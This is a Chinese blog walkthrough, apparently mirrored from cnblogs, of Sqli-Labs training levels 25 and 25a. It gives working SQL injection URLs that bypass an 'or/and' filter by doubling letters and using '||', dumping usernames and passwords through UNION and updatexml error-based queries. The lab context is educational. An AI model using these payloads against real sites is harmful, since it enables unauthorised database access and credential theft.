zoukankan      html  css  js  c++  java
  • Sqli-Labs less25-25a

    less-25

    前置基础知识:后面的关卡涉及到WAF绕过:

    主要有三种方式:白盒绕过、黑盒绕过、fuzz测试

    网上sql注入WAF绕过的教程有很多,可以自己查询,总之就是比谁思路猥琐

    根据第25关下面的提示和代码,我们发现他对or和and(不区分大小写)转义成了空格

    第一种办法:

    采用双写的方式

    这里就直接最后一步了,几个步骤都相同:http://192.168.5.100/sqli-labs/Less-25/?id=0' union select 1,2,group_concat(concat_ws('-',username,passwoorrd)) from security.users --+(注意password中or双写)

    第二种方法:or->|| 基于报错的注入

    http://192.168.5.100/sqli-labs/Less-25/?id=0' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+

    遍历爆出所有的数据,继续使用即可,这里不可以使用group_concat(),因为数据显示不完整

    less-25a

    通过观察,上一关有’‘包裹,这一关没有任何包裹,并且也是转义or和and

    :http://192.168.5.100/sqli-labs/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+

     

     

  • 相关阅读:
    数组协变性
    tomcat源码阅读23
    用枚举来实现单例模式
    CSS 的 zindex 属性
    屏幕大小与视区大小
    CSS 生成的模态窗口
    事件处理程序的绑定
    事件对象的属性和使用
    android打电话,接电话,挂电话过程
    ubuntu 12.04编译ics
  • 原文地址:https://www.cnblogs.com/hzk001/p/12232579.html
Copyright © 2011-2022 走看看